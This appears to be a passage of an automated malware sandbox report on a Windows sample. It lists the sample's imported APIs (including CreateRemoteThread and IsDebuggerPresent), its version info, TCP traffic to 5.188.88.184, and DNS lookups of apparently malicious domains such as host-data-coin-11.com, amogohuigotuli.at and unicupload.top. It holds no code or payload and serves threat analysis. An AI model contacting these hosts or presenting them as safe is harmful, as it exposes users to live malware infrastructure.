                                                                              KERNEL32.dllGetStringTypeA, VirtualQuery, FindResourceExW, OpenJobObjectA, ReadConsoleA, GetConsoleAliasA, InterlockedDecrement, CompareFileTime, GetConsoleAliasesA, GetConsoleAliasesLengthA, CreateRemoteThread, SetFileTime, GlobalAlloc, TerminateThread, GetLocaleInfoW, GetVersionExW, GetFileAttributesW, GetAtomNameW, GetModuleFileNameW, ReleaseSemaphore, SetComputerNameExA, GetLastError, GetLongPathNameW, GetProcAddress, VirtualAlloc, WriteConsoleA, DnsHostnameToComputerNameA, GetFileType, HeapLock, GetModuleFileNameA, GetDefaultCommConfigA, WTSGetActiveConsoleSessionId, GetModuleHandleA, GetConsoleTitleW, ReadConsoleInputW, GetProfileSectionW, CreateThread, SetConsoleTitleA, HeapAlloc, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualFree, HeapReAlloc, HeapCreate, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, SetFilePointer, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, CloseHandle, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, LoadLibraryA, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CreateFileA, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, HeapSize, GetLocaleInfoA, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeW, SetEndOfFile, GetProcessHeap, ReadFile, GetConsoleOutputCP, WriteConsoleW
                                                                              USER32.dllClientToScreen
                                                                              ADVAPI32.dllAdjustTokenGroups

                                                                              Version Infos

                                                                              DescriptionData
                                                                              ProjectVersion3.10.70.17
                                                                              InternationalNamebomgvioci.iwa
                                                                              CopyrightCopyrighz (C) 2021, fudkort
                                                                              Translation0x0129 0x0794

                                                                              Possible Origin

                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              SpanishArgentina

                                                                              Network Behavior

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jan 11, 2022 20:43:46.669440985 CET4978080192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:46.737951994 CET80497805.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:46.738069057 CET4978080192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:46.738280058 CET4978080192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:46.738313913 CET4978080192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:46.806694031 CET80497805.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:46.864423990 CET80497805.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:46.864545107 CET4978080192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:46.865696907 CET4978080192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:46.896534920 CET4978280192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:46.934993982 CET80497805.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:46.967214108 CET80497825.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:46.967354059 CET4978280192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:46.967593908 CET4978280192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:46.967653990 CET4978280192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:47.038868904 CET80497825.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:47.096057892 CET80497825.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:47.096247911 CET80497825.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:47.096314907 CET4978280192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:47.096550941 CET4978280192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:47.168271065 CET80497825.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:51.484698057 CET4978980192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:51.551450014 CET80497895.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:51.551728010 CET4978980192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:51.551911116 CET4978980192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:51.552058935 CET4978980192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:51.619788885 CET80497895.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:51.619810104 CET80497895.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:51.668071032 CET80497895.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:51.668190002 CET4978980192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:51.694767952 CET4978980192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:51.762737989 CET80497895.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:52.096221924 CET4979080192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:52.163091898 CET80497905.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:52.163247108 CET4979080192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:52.163435936 CET4979080192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:52.163455009 CET4979080192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:52.231417894 CET80497905.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:52.283526897 CET80497905.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:52.283698082 CET4979080192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:52.284367085 CET4979080192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:52.316251993 CET4979180192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:52.351236105 CET80497905.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:52.383275986 CET80497915.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:52.385906935 CET4979180192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:52.386112928 CET4979180192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:52.386141062 CET4979180192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:52.452924013 CET80497915.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:52.506195068 CET80497915.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:52.506459951 CET4979180192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:52.558232069 CET4979180192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:52.624994040 CET80497915.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:52.955127001 CET4979280192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:53.018362045 CET80497925.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:53.018539906 CET4979280192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:53.018719912 CET4979280192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:53.018732071 CET4979280192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:53.081470013 CET80497925.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:53.131622076 CET80497925.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:53.131709099 CET4979280192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:53.134125948 CET4979280192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:53.150789976 CET4979380192.168.2.4185.186.142.166
                                                                              Jan 11, 2022 20:43:53.198100090 CET80497925.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:53.206370115 CET8049793185.186.142.166192.168.2.4
                                                                              Jan 11, 2022 20:43:53.707741022 CET4979380192.168.2.4185.186.142.166
                                                                              Jan 11, 2022 20:43:53.763816118 CET8049793185.186.142.166192.168.2.4
                                                                              Jan 11, 2022 20:43:54.269686937 CET4979380192.168.2.4185.186.142.166
                                                                              Jan 11, 2022 20:43:54.325916052 CET8049793185.186.142.166192.168.2.4
                                                                              Jan 11, 2022 20:43:54.398792028 CET4979480192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:54.465532064 CET80497945.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:54.465729952 CET4979480192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:54.549424887 CET4979480192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:54.549467087 CET4979480192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:54.616719007 CET80497945.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:54.668128967 CET80497945.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:54.668358088 CET4979480192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:55.252258062 CET4979480192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:55.319459915 CET80497945.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:55.564165115 CET4979580192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:55.639174938 CET80497955.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:55.639352083 CET4979580192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:55.639556885 CET4979580192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:55.639586926 CET4979580192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:55.714654922 CET80497955.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:55.769177914 CET80497955.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:55.769479990 CET4979580192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:55.770010948 CET4979580192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:55.844923973 CET80497955.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:56.089282036 CET4979680192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:56.162411928 CET80497965.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:56.162602901 CET4979680192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:56.162806034 CET4979680192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:56.266437054 CET80497965.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:56.266468048 CET80497965.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:56.266494036 CET80497965.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:56.266520023 CET80497965.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:56.266546011 CET80497965.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:56.266557932 CET4979680192.168.2.45.188.88.184
                                                                              Jan 11, 2022 20:43:56.266571999 CET80497965.188.88.184192.168.2.4
                                                                              Jan 11, 2022 20:43:56.266587019 CET4979680192.168.2.45.188.88.184

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                              Jan 11, 2022 20:43:46.347280025 CET192.168.2.48.8.8.80xa8a5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:46.877681971 CET192.168.2.48.8.8.80xcc98Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:47.105545998 CET192.168.2.48.8.8.80x1c28Standard query (0)privacytools-foryou-777.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:48.081870079 CET192.168.2.48.8.8.80x1c28Standard query (0)privacytools-foryou-777.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:49.128726006 CET192.168.2.48.8.8.80x1c28Standard query (0)privacytools-foryou-777.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:51.128952980 CET192.168.2.48.8.8.80x1c28Standard query (0)privacytools-foryou-777.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:51.170697927 CET192.168.2.48.8.8.80x6ed0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:51.777542114 CET192.168.2.48.8.8.80x107fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:52.296855927 CET192.168.2.48.8.8.80xdfe0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:52.640510082 CET192.168.2.48.8.8.80x1462Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:54.380738020 CET192.168.2.48.8.8.80x1f2aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:55.272808075 CET192.168.2.48.8.8.80x5564Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:55.783123970 CET192.168.2.48.8.8.80xae61Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:58.333600998 CET192.168.2.48.8.8.80x773fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:58.567286968 CET192.168.2.48.8.8.80xcba3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:59.080667973 CET192.168.2.48.8.8.80xe5a9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:59.430988073 CET192.168.2.48.8.8.80x5467Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:59.662477970 CET192.168.2.48.8.8.80xb7ceStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:59.890969038 CET192.168.2.48.8.8.80xfc43Standard query (0)unicupload.topA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:59.973516941 CET192.168.2.48.8.8.80xb2dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:00.552799940 CET192.168.2.48.8.8.80xea83Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:01.078349113 CET192.168.2.48.8.8.80x8d1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:01.317899942 CET192.168.2.48.8.8.80xfd8eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:01.557907104 CET192.168.2.48.8.8.80xdcdcStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:04.558516979 CET192.168.2.48.8.8.80xa653Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:04.793056011 CET192.168.2.48.8.8.80x6aa5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:05.025754929 CET192.168.2.48.8.8.80xb4c3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:05.303052902 CET192.168.2.48.8.8.80x4763Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:07.732112885 CET192.168.2.48.8.8.80xf243Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:07.961663961 CET192.168.2.48.8.8.80x61faStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:08.520370960 CET192.168.2.48.8.8.80x948eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:08.764693975 CET192.168.2.48.8.8.80x985fStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:12.600018024 CET192.168.2.48.8.8.80xa882Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:13.858827114 CET192.168.2.48.8.8.80x9841Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:14.092466116 CET192.168.2.48.8.8.80x448aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:26.588733912 CET192.168.2.48.8.8.80x8b01Standard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:29.395040989 CET192.168.2.48.8.8.80x96fcStandard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:35.702203989 CET192.168.2.48.8.8.80xaff2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:35.947173119 CET192.168.2.48.8.8.80xb2a8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:36.232759953 CET192.168.2.48.8.8.80xc05fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:36.335243940 CET192.168.2.48.8.8.80x5388Standard query (0)srtuiyhuali.atA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:36.400243998 CET192.168.2.48.8.8.80xf6aaStandard query (0)fufuiloirtu.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:36.493026972 CET192.168.2.48.8.8.80xc60Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:36.610769033 CET192.168.2.48.8.8.80x6054Standard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:36.741300106 CET192.168.2.48.8.8.80xbc11Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:36.969822884 CET192.168.2.48.8.8.80xd877Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:37.192749023 CET192.168.2.48.8.8.80xb938Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:37.434124947 CET192.168.2.48.8.8.80xa0f5Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:38.464155912 CET192.168.2.48.8.8.80xa33fStandard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:40.702649117 CET192.168.2.48.8.8.80x727Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:40.909248114 CET192.168.2.48.8.8.80x4752Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:41.145545959 CET192.168.2.48.8.8.80x26dbStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:41.350753069 CET192.168.2.48.8.8.80x28f2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:41.573332071 CET192.168.2.48.8.8.80x17c6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:41.791461945 CET192.168.2.48.8.8.80x6252Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:42.010826111 CET192.168.2.48.8.8.80xce66Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:42.227250099 CET192.168.2.48.8.8.80xbbc7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:42.467854977 CET192.168.2.48.8.8.80x4694Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:42.684598923 CET192.168.2.48.8.8.80xe569Standard query (0)goo.suA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:43.212213993 CET192.168.2.48.8.8.80xdce1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:43.435756922 CET192.168.2.48.8.8.80x11ebStandard query (0)goo.suA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:44.382760048 CET192.168.2.48.8.8.80xf098Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:44.899312973 CET192.168.2.48.8.8.80x469cStandard query (0)transfer.shA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:45.074127913 CET192.168.2.48.8.8.80x968eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:45.278002024 CET192.168.2.48.8.8.80x4cd8Standard query (0)softwaresworld.netA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:46.897808075 CET192.168.2.48.8.8.80x96b0Standard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:51.141447067 CET192.168.2.48.8.8.80x4c6bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:51.141987085 CET192.168.2.48.8.8.80x897fStandard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:51.366715908 CET192.168.2.48.8.8.80x644eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:51.609699011 CET192.168.2.48.8.8.80x5846Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:51.838324070 CET192.168.2.48.8.8.80xe8cbStandard query (0)transfer.shA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.096421003 CET192.168.2.48.8.8.80xb87cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.314853907 CET192.168.2.48.8.8.80xc88Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.522349119 CET192.168.2.48.8.8.80x41c4Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.757340908 CET192.168.2.48.8.8.80xe014Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.802618980 CET192.168.2.48.8.8.80x8a31Standard query (0)unic11m.topA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.954039097 CET192.168.2.48.8.8.80x7974Standard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:55.775578976 CET192.168.2.48.8.8.80xe54aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:55.779691935 CET192.168.2.48.8.8.80x1c9eStandard query (0)unicupload.topA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:55.868988037 CET192.168.2.48.8.8.80x66ccStandard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.010751963 CET192.168.2.48.8.8.80xdfe7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.251651049 CET192.168.2.48.8.8.80x4246Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.298286915 CET192.168.2.48.8.8.80x6942Standard query (0)noc.socialA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.393604040 CET192.168.2.48.8.8.80x5058Standard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.883686066 CET192.168.2.48.8.8.80x6926Standard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:00.083373070 CET192.168.2.48.8.8.80x7995Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:00.306257010 CET192.168.2.48.8.8.80xee0bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:00.525938034 CET192.168.2.48.8.8.80x89f2Standard query (0)bit.lyA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:00.723368883 CET192.168.2.48.8.8.80x8187Standard query (0)github.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:01.179241896 CET192.168.2.48.8.8.80xdc20Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:01.867950916 CET192.168.2.48.8.8.80x91c8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:02.099030972 CET192.168.2.48.8.8.80xc1c2Standard query (0)a0620531.xsph.ruA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:04.004987955 CET192.168.2.48.8.8.80x47e1Standard query (0)api.2ip.uaA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.183027029 CET192.168.2.48.8.8.80xc752Standard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.215806961 CET192.168.2.48.8.8.80x10dfStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.541882038 CET192.168.2.48.8.8.80x630fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:07.744271994 CET192.168.2.48.8.8.80x3fStandard query (0)transfer.shA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:09.998613119 CET192.168.2.48.8.8.80x5821Standard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.669603109 CET192.168.2.48.8.8.80x9d57Standard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:15.346198082 CET192.168.2.48.8.8.80x6d85Standard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:15.431581974 CET192.168.2.48.8.8.80x7f0dStandard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:15.827282906 CET192.168.2.48.8.8.80x9971Standard query (0)iplogger.orgA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:16.692194939 CET192.168.2.48.8.8.80x3e8cStandard query (0)a0620531.xsph.ruA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:19.227754116 CET192.168.2.48.8.8.80xb587Standard query (0)dl.uploadgram.meA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:19.525394917 CET192.168.2.48.8.8.80x7534Standard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:20.992842913 CET192.168.2.48.8.8.80xb0abStandard query (0)a0620531.xsph.ruA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:31.398617983 CET192.168.2.48.8.8.80x472dStandard query (0)yandex.ruA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:33.966952085 CET192.168.2.48.8.8.80xf407Standard query (0)a0620531.xsph.ruA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:46:09.989973068 CET192.168.2.48.8.8.80x8403Standard query (0)patmushta.infoA (IP address)IN (0x0001)

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                              Jan 11, 2022 20:43:46.665888071 CET8.8.8.8192.168.2.40xa8a5No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:46.895819902 CET8.8.8.8192.168.2.40xcc98No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:51.154884100 CET8.8.8.8192.168.2.40x1c28Server failure (2)privacytools-foryou-777.comnonenoneA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:51.483428955 CET8.8.8.8192.168.2.40x6ed0No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:52.095397949 CET8.8.8.8192.168.2.40x107fNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:52.122339010 CET8.8.8.8192.168.2.40x1c28Server failure (2)privacytools-foryou-777.comnonenoneA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:52.315399885 CET8.8.8.8192.168.2.40xdfe0No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:52.953062057 CET8.8.8.8192.168.2.40x1462No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:53.154812098 CET8.8.8.8192.168.2.40x1c28Server failure (2)privacytools-foryou-777.comnonenoneA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:54.397541046 CET8.8.8.8192.168.2.40x1f2aNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:55.194344997 CET8.8.8.8192.168.2.40x1c28Server failure (2)privacytools-foryou-777.comnonenoneA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:55.562896013 CET8.8.8.8192.168.2.40x5564No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
